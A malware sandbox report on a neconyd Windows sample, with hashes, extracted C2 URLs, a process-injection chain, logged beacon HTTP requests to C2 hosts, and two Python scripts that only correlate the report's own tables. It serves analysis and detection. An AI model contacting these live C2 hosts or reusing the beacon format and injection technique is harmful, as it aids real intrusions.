Analysis
  Max time kernel:   115s
  Max time network:  124s
  Platform:          windows10-2004_x64
  Resource:          win10v2004-20241007-en
  Resource tags:     arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  Submitted:         20/01/2025, 23:24 UTC

Static task:      static1
Behavioral task:  behavioral1
  Sample:    ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe
  Resource:  win7-20240903-en
General
  Target:  ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe
  Size:    96KB
  MD5:     e5cab32bd5eab5060289bc0ea34f735c
  SHA1:    737c299f7b86fd4fbcbd0b5c1046f42ec09607c4
  SHA256:  ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339
  SHA512:  b6097459627e944cd6924ada9e029a34a439c61a3b48678016703dd15c96f243394ab5d3d47c0e3949eb314c70bb2633865c3927e394801d1a727ffab161d328
  SSDEEP:  1536:LnAHcBbLmdvduLd8IDiaP/8A68YaiIv2RwEYqlwi+BzdAeV9b5ADbyxx7:LGs8cd8eXlYairZYqMddH137
Malware Config
  Extracted family: neconyd
  C2 URLs:
    http://ow5dirasuek.com/
    http://mkkuei4kdsz.com/
    http://lousta.net/
Signatures

- Neconyd family

- Executes dropped EXE (6 IoCs)
    PID    Process
    5036   omsecor.exe
    5016   omsecor.exe
    3628   omsecor.exe
    4360   omsecor.exe
    724    omsecor.exe
    3116   omsecor.exe

- Drops file in System32 directory (1 IoC)
    Description   IoC                               Process
    File created  C:\Windows\SysWOW64\omsecor.exe   omsecor.exe
  Caveat: the sample is 32-bit (it is handled by the 32-bit WerFault.exe from SysWOW64), so a write aimed at System32 is redirected by WOW64 file-system redirection to SysWOW64. This is why the level-5 process in the tree below has the image path C:\Windows\SysWOW64\omsecor.exe while its command line names C:\Windows\System32\omsecor.exe.

- Suspicious use of SetThreadContext (4 IoCs)
    Source PID  Target PID  Process                                                               procid_target
    4496        1236        ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe  83
    5036        5016        omsecor.exe                                                           87
    3628        4360        omsecor.exe                                                           110
    724         3116        omsecor.exe                                                           114

- Program crash (4 IoCs)
    PID    pid_target  Process       procid_target
    4540   4496        WerFault.exe  82
    4708   5036        WerFault.exe  86
    4552   3628        WerFault.exe  109
    4404   724         WerFault.exe  112
  Note that the four crashed processes (4496, 5036, 3628, 724) are exactly the four that performed SetThreadContext on a child.

- System Location Discovery: System Language Discovery (1 TTP, 8 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
    Description  IoC                                                         Process
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  omsecor.exe (6 events)
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe (2 events)

- Suspicious use of WriteProcessMemory (29 IoCs)
  The report lists one row per write; identical rows are collapsed here with a count.
    Source PID  Target PID  Process                                                               procid_target  Rows
    4496        1236        ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe  83             5
    1236        5036        ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe  86             3
    5036        5016        omsecor.exe                                                           87             5
    5016        3628        omsecor.exe                                                           109            3
    3628        4360        omsecor.exe                                                           110            5
    4360        724         omsecor.exe                                                           112            3
    724         3116        omsecor.exe                                                           114            5
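The SetThreadContext and WriteProcessMemory rows above describe the same parent-to-child pairs: every pair that also sets a thread context has five write rows, every pair that only writes has three, and the four writers that set a thread context are the four that WerFault later reports as crashed. The Python below is a worked example added to this report, not part of the sandbox output. It transcribes the rows in the report's own format (constructed input), classifies each writer-to-target pair as injection (write plus SetThreadContext, the usual process-hollowing heuristic) or plain spawn (write only, matching ordinary child creation in the process tree), rebuilds the eight-process chain, and marks which injecting parents crashed. The classification rule is the analyst's heuristic, not something the sandbox asserts.

```python
"""Correlate WriteProcessMemory / SetThreadContext / WerFault rows into an injection chain."""
import re
from collections import Counter

SAMPLE = "ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe"

# Constructed input transcribed from the report's IoC tables; each row is repeated
# as many times as the report lists it (5 on SetThreadContext edges, 3 on the others).
WRITE_EVENTS = (
    [f"PID 4496 wrote to memory of 1236 4496 {SAMPLE} 83"] * 5
    + [f"PID 1236 wrote to memory of 5036 1236 {SAMPLE} 86"] * 3
    + ["PID 5036 wrote to memory of 5016 5036 omsecor.exe 87"] * 5
    + ["PID 5016 wrote to memory of 3628 5016 omsecor.exe 109"] * 3
    + ["PID 3628 wrote to memory of 4360 3628 omsecor.exe 110"] * 5
    + ["PID 4360 wrote to memory of 724 4360 omsecor.exe 112"] * 3
    + ["PID 724 wrote to memory of 3116 724 omsecor.exe 114"] * 5
)
CTX_EVENTS = [
    f"PID 4496 set thread context of 1236 4496 {SAMPLE} 83",
    "PID 5036 set thread context of 5016 5036 omsecor.exe 87",
    "PID 3628 set thread context of 4360 3628 omsecor.exe 110",
    "PID 724 set thread context of 3116 724 omsecor.exe 114",
]
CRASH_EVENTS = [  # "pid pid_target Process procid_target" rows of the Program crash table
    "4540 4496 WerFault.exe 82",
    "4708 5036 WerFault.exe 86",
    "4552 3628 WerFault.exe 109",
    "4404 724 WerFault.exe 112",
]

WRITE_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) \d+$")
CTX_RE = re.compile(r"PID (\d+) set thread context of (\d+) \d+ \S+ \d+$")
CRASH_RE = re.compile(r"\d+ (\d+) WerFault\.exe \d+$")


def parse(write_events, ctx_events, crash_events):
    """Return write counts per (src, dst), writer image per src pid, ctx pairs, crashed pids."""
    writes, image = Counter(), {}
    for line in write_events:
        src, dst, img = WRITE_RE.match(line).groups()
        writes[(int(src), int(dst))] += 1
        image[int(src)] = img
    ctx = {tuple(map(int, CTX_RE.match(l).groups())) for l in ctx_events}
    crashed = {int(CRASH_RE.match(l).group(1)) for l in crash_events}
    return writes, image, ctx, crashed


def classify_edges(write_events=WRITE_EVENTS, ctx_events=CTX_EVENTS, crash_events=CRASH_EVENTS):
    """One dict per writer->target pair. Write + SetThreadContext on the same pair is the
    hollowing/injection heuristic; write-only pairs match ordinary child creation."""
    writes, image, ctx, crashed = parse(write_events, ctx_events, crash_events)
    return [
        {"src": src, "dst": dst, "image": image[src], "writes": n,
         "injection": (src, dst) in ctx, "src_crashed": src in crashed}
        for (src, dst), n in writes.items()
    ]


def process_chain(edges):
    """Follow src->dst edges from the root (the only pid never used as a target) to the last stage."""
    nxt = {e["src"]: e["dst"] for e in edges}
    roots = [p for p in nxt if p not in nxt.values()]
    if len(roots) != 1:
        raise ValueError(f"expected a single chain root, found {roots}")
    chain = [roots[0]]
    while chain[-1] in nxt:
        chain.append(nxt[chain[-1]])
    return chain


def injection_pairs(edges):
    """Sorted (src, dst) pairs that carry both a write and a SetThreadContext."""
    return sorted((e["src"], e["dst"]) for e in edges if e["injection"])


if __name__ == "__main__":
    edges = classify_edges()
    print("chain:", " -> ".join(map(str, process_chain(edges))))
    for e in edges:
        kind = "INJECT" if e["injection"] else "spawn "
        print(f"{kind} {e['src']:>5} -> {e['dst']:<5} writes={e['writes']} "
              f"src_crashed={e['src_crashed']} image={e['image']}")
```

Run as a script it prints the chain 4496 -> 1236 -> 5036 -> 5016 -> 3628 -> 4360 -> 724 -> 3116 with alternating INJECT and spawn edges; the parsers are deliberately strict (`match` plus `$`) so that a row in an unexpected layout raises rather than being silently skipped.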
Processes
(Level numbers are the tree depth shown in the report; each entry gives image path, command line, PID and the signatures raised by that process.)

Level 1: C:\Users\Admin\AppData\Local\Temp\ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe  (PID 4496)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe"
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Users\Admin\AppData\Local\Temp\ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe  (PID 1236)
    Command line: C:\Users\Admin\AppData\Local\Temp\ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Users\Admin\AppData\Roaming\omsecor.exe  (PID 5036)
      Command line: C:\Users\Admin\AppData\Roaming\omsecor.exe
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      Level 4: C:\Users\Admin\AppData\Roaming\omsecor.exe  (PID 5016)
        Command line: C:\Users\Admin\AppData\Roaming\omsecor.exe
        - Executes dropped EXE
        - Drops file in System32 directory
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        Level 5: C:\Windows\SysWOW64\omsecor.exe  (PID 3628)
          Command line: C:\Windows\System32\omsecor.exe
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory

          Level 6: C:\Windows\SysWOW64\omsecor.exe  (PID 4360)
            Command line: C:\Windows\SysWOW64\omsecor.exe
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

            Level 7: C:\Users\Admin\AppData\Roaming\omsecor.exe  (PID 724)
              Command line: C:\Users\Admin\AppData\Roaming\omsecor.exe
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              - System Location Discovery: System Language Discovery
              - Suspicious use of WriteProcessMemory

              Level 8: C:\Users\Admin\AppData\Roaming\omsecor.exe  (PID 3116)
                Command line: C:\Users\Admin\AppData\Roaming\omsecor.exe
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery

              Level 8: C:\Windows\SysWOW64\WerFault.exe  (PID 4404)
                Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 724 -s 268
                - Program crash

          Level 6: C:\Windows\SysWOW64\WerFault.exe  (PID 4552)
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 292
            - Program crash

      Level 4: C:\Windows\SysWOW64\WerFault.exe  (PID 4708)
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 300
        - Program crash

  Level 2: C:\Windows\SysWOW64\WerFault.exe  (PID 4540)
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 264
    - Program crash

Level 1: C:\Windows\SysWOW64\WerFault.exe  (PID 1416)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4496 -ip 4496

Level 1: C:\Windows\SysWOW64\WerFault.exe  (PID 2984)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5036 -ip 5036

Level 1: C:\Windows\SysWOW64\WerFault.exe  (PID 3884)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3628 -ip 3628

Level 1: C:\Windows\SysWOW64\WerFault.exe  (PID 2800)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 724 -ip 724
Network

- Remote address: 8.8.8.8:53
    Request:  8.8.8.8.in-addr.arpa IN PTR
    Response: 8.8.8.8.in-addr.arpa IN PTR dns.google

- Remote address: 8.8.8.8:53
    Request:  lousta.net IN A
    Response: lousta.net IN A 193.166.255.171

- Remote address: 8.8.8.8:53
    Request:  209.205.72.20.in-addr.arpa IN PTR
    Response: (empty)

- Remote address: 8.8.8.8:53
    Request:  86.49.80.91.in-addr.arpa IN PTR
    Response: (empty)

- Remote address: 8.8.8.8:53
    Request:  140.32.126.40.in-addr.arpa IN PTR
    Response: (empty)

- Remote address: 8.8.8.8:53
    Request:  167.173.78.104.in-addr.arpa IN PTR
    Response: 167.173.78.104.in-addr.arpa IN PTR a104-78-173-167.deploy.static.akamaitechnologies.com

- Remote address: 8.8.8.8:53
    Request:  104.219.191.52.in-addr.arpa IN PTR
    Response: (empty)

- Remote address: 8.8.8.8:53
    Request:  232.168.11.51.in-addr.arpa IN PTR
    Response: (empty)

- Remote address: 8.8.8.8:53
    Request:  56.163.245.4.in-addr.arpa IN PTR
    Response: (empty)

- Remote address: 8.8.8.8:53
    Request:  206.23.85.13.in-addr.arpa IN PTR
    Response: (empty)

- Remote address: 8.8.8.8:53
    Request:  172.210.232.199.in-addr.arpa IN PTR
    Response: (empty)

- Remote address: 8.8.8.8:53
    Request:  20.49.80.91.in-addr.arpa IN PTR
    Response: (empty)

- Remote address: 8.8.8.8:53
    Request:  mkkuei4kdsz.com IN A
    Response: mkkuei4kdsz.com IN A 3.33.243.145
              mkkuei4kdsz.com IN A 15.197.204.56

- Remote address: 3.33.243.145:80
    Request:
      GET /224/21.html HTTP/1.1
      From: 133819393747309207
      Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>02d_af_96_0d.4c/1c661^c23bc-04c6
      Host: mkkuei4kdsz.com
      Connection: Keep-Alive
    Response:
      HTTP/1.1 200 OK
      date: Tue, 21 Jan 2025 13:23:58 GMT
      content-length: 114

- Remote address: 8.8.8.8:53
    Request:  145.243.33.3.in-addr.arpa IN PTR
    Response: 145.243.33.3.in-addr.arpa IN PTR a3edc0dabdef92d6d.awsglobalaccelerator.com

- Remote address: 8.8.8.8:53
    Request:  ow5dirasuek.com IN A
    Response: ow5dirasuek.com IN A 52.34.198.229

- Remote address: 52.34.198.229:80
    Request:
      GET /827/650.html HTTP/1.1
      From: 133819393747309207
      Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>02d_af_96_0d.4c/1c661^c23bc-04c6
      Host: ow5dirasuek.com
      Connection: Keep-Alive
    Response:
      HTTP/1.1 200 OK
      Date: Tue, 21 Jan 2025 13:24:08 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: btst=0f0d6f49eafd2f0f48d5814482ebe3de|181.215.176.83|1737465848|1737465848|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

- Remote address: 8.8.8.8:53
    Request:  229.198.34.52.in-addr.arpa IN PTR
    Response: 229.198.34.52.in-addr.arpa IN PTR ec2-52-34-198-229.us-west-2.compute.amazonaws.com

- Remote address: 8.8.8.8:53
    Request:  172.214.232.199.in-addr.arpa IN PTR
    Response: (empty)

Note that both HTTP requests carry the same non-standard From header value (133819393747309207) and the same Via header value; only the Host and path differ.
Traffic summary

  Tx bytes  Rx bytes  Tx pkts  Rx pkts  Protocol  Detail
  260 B               5                           (unlabelled flow)
  260 B               5                           (unlabelled flow)
  466 B     388 B     6        4        HTTP      GET http://mkkuei4kdsz.com/224/21.html -> 200
  467 B     631 B     6        5        HTTP      GET http://ow5dirasuek.com/827/650.html -> 200
  260 B               5                           (unlabelled flow)
  156 B               3                           (unlabelled flow)
  66 B      90 B      1        1        DNS       8.8.8.8.in-addr.arpa
  56 B      72 B      1        1        DNS       lousta.net -> 193.166.255.171
  72 B      158 B     1        1        DNS       209.205.72.20.in-addr.arpa
  70 B      145 B     1        1        DNS       86.49.80.91.in-addr.arpa
  72 B      158 B     1        1        DNS       140.32.126.40.in-addr.arpa
  73 B      139 B     1        1        DNS       167.173.78.104.in-addr.arpa
  73 B      147 B     1        1        DNS       104.219.191.52.in-addr.arpa
  72 B      158 B     1        1        DNS       232.168.11.51.in-addr.arpa
  71 B      157 B     1        1        DNS       56.163.245.4.in-addr.arpa
  71 B      145 B     1        1        DNS       206.23.85.13.in-addr.arpa
  74 B      128 B     1        1        DNS       172.210.232.199.in-addr.arpa
  70 B      145 B     1        1        DNS       20.49.80.91.in-addr.arpa
  61 B      93 B      1        1        DNS       mkkuei4kdsz.com -> 3.33.243.145, 15.197.204.56
  71 B      127 B     1        1        DNS       145.243.33.3.in-addr.arpa
  61 B      77 B      1        1        DNS       ow5dirasuek.com -> 52.34.198.229
  72 B      135 B     1        1        DNS       229.198.34.52.in-addr.arpa
  74 B      128 B     1        1        DNS       172.214.232.199.in-addr.arpa
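Of the three C2 URLs in the extracted configuration, the capture shows all three hosts resolving but only two receiving HTTP requests. The Python below is an added worked example, not part of the sandbox output. It transcribes the A-record and HTTP rows above as constructed input, maps each configured host to the addresses it resolved to and the requests sent to it, checks that every HTTP destination IP was among the addresses DNS returned for that Host header, and collects the non-standard From header, which has the same value on both requests. Reading that constant as a per-host or per-campaign identifier is the analyst's inference, not something the report states; the Via header is reproduced verbatim and not interpreted.

```python
"""Correlate extracted neconyd C2 URLs with the DNS and HTTP records of one sandbox run."""
import re
from urllib.parse import urlparse

EXTRACTED_C2 = ["http://ow5dirasuek.com/", "http://mkkuei4kdsz.com/", "http://lousta.net/"]

# Constructed input transcribed from the report's Network section.
DNS_RECORDS = [
    "Request 8.8.8.8.in-addr.arpa IN PTR Response 8.8.8.8.in-addr.arpa IN PTR dns.google",
    "Request lousta.net IN A Response lousta.net IN A 193.166.255.171",
    "Request 209.205.72.20.in-addr.arpa IN PTR Response",
    "Request mkkuei4kdsz.com IN A Response mkkuei4kdsz.com IN A 3.33.243.145 mkkuei4kdsz.com IN A 15.197.204.56",
    "Request ow5dirasuek.com IN A Response ow5dirasuek.com IN A 52.34.198.229",
]
VIA = "dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>02d_af_96_0d.4c/1c661^c23bc-04c6"
HTTP_RECORDS = [  # (remote address, raw request head, response status line)
    ("3.33.243.145:80",
     f"GET /224/21.html HTTP/1.1\r\nFrom: 133819393747309207\r\nVia: {VIA}\r\n"
     "Host: mkkuei4kdsz.com\r\nConnection: Keep-Alive\r\n",
     "HTTP/1.1 200 OK"),
    ("52.34.198.229:80",
     f"GET /827/650.html HTTP/1.1\r\nFrom: 133819393747309207\r\nVia: {VIA}\r\n"
     "Host: ow5dirasuek.com\r\nConnection: Keep-Alive\r\n",
     "HTTP/1.1 200 OK"),
]

A_RECORD = re.compile(r"(\S+) IN A (\d{1,3}(?:\.\d{1,3}){3})")


def parse_dns(records):
    """host -> list of A-record IPs, taken only from the Response half (PTR rows contribute nothing)."""
    resolved = {}
    for rec in records:
        _, _, response = rec.partition(" Response ")
        for host, ip in A_RECORD.findall(response):
            resolved.setdefault(host.lower(), []).append(ip)
    return resolved


def parse_http(records):
    """Split each raw request head into method, path, lowercased headers, destination IP and status."""
    out = []
    for remote, request, status_line in records:
        lines = request.split("\r\n")
        method, path, _ = lines[0].split(" ", 2)
        headers = {}
        for h in lines[1:]:
            if ":" in h:
                name, value = h.split(":", 1)
                headers[name.strip().lower()] = value.strip()
        out.append({"dest_ip": remote.rsplit(":", 1)[0], "method": method, "path": path,
                    "host": headers.get("host", "").lower(), "headers": headers,
                    "status": int(status_line.split()[1])})
    return out


def correlate(c2_urls=EXTRACTED_C2, dns_records=DNS_RECORDS, http_records=HTTP_RECORDS):
    """Per configured C2 host: resolved IPs, (dest_ip, path, status) requests, and whether every
    request went to an IP that DNS actually returned for that host."""
    resolved = parse_dns(dns_records)
    requests = parse_http(http_records)
    report = {}
    for url in c2_urls:
        host = urlparse(url).hostname.lower()
        ips = resolved.get(host, [])
        hits = [(r["dest_ip"], r["path"], r["status"]) for r in requests if r["host"] == host]
        report[host] = {"resolved": ips, "requests": hits,
                        "dest_in_dns": all(ip in ips for ip, _, _ in hits)}
    return report


def beacon_ids(http_records=HTTP_RECORDS):
    """Distinct values of the non-standard From header across all requests."""
    return {r["headers"].get("from") for r in parse_http(http_records)}


if __name__ == "__main__":
    for host, info in correlate().items():
        print(host, "->", ", ".join(info["resolved"]) or "(unresolved)")
        for dest, path, status in info["requests"]:
            print(f"    GET {path} to {dest}: {status}")
    print("From header values:", beacon_ids())
```

A host that resolves but is never contacted (lousta.net here) is worth keeping on the block list anyway: the configuration carries all three, and the run only shows which ones answered first.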
MITRE ATT&CK Enterprise v15
  Discovery: System Location Discovery: System Language Discovery (T1614.001)
Downloads

- File 1
    Filesize:  96KB
    MD5:       360ce3a33c680076b20025ee501bfe02
    SHA1:      508c0c9f4df423a10172f730a82c6e9ec2e8fcef
    SHA256:    ab2c92aa7a475a83613c9ba3393a1f63016feb6fd10e96aa365c6b0eafe8624a
    SHA512:    e6ddc4d87e0bb5e2adfe85724c72881edd8c529bb0bc7164a1ef59af6e468e699f048bc832efb0a7dc26421eea8b9523b5fe9f31f74982cca1a308008037a13a

- File 2
    Filesize:  96KB
    MD5:       9ee8b565267a990277bef46a8dc43dd9
    SHA1:      08e93fd4cfa911bb196f66b828044a9002d307ae
    SHA256:    231c819c8f69b1ad891c72e62529dff9654c9229ecc9172943a7a885d06a2bc4
    SHA512:    d1736477561bcbad128dda4f14821fbdcde079dce74e5097cf1822aa5676146e78a7abbbbcdfcd8032ba8bb317b9efdd5775f0dcf29e7308ea4d6c8b33f21e3c

- File 3
    Filesize:  96KB
    MD5:       a914ebad03a744edcf1a726d8a4d68ee
    SHA1:      801eda3b189058b074055b592d26995ddb724737
    SHA256:    74553524368e057db36e850da08f26bb8f28519dbabf059752a981460535db49
    SHA512:    0ddce33a723b17a9077c2439af3c28ab0ba44ee6ab8bd56930545736eddcd2d55b4ec8b222aaf821a6d3a59d823d83ed3c2c620f362d001183b0c99648759477

All three files match the submitted sample's size (96KB) but none of their hashes matches it or each other.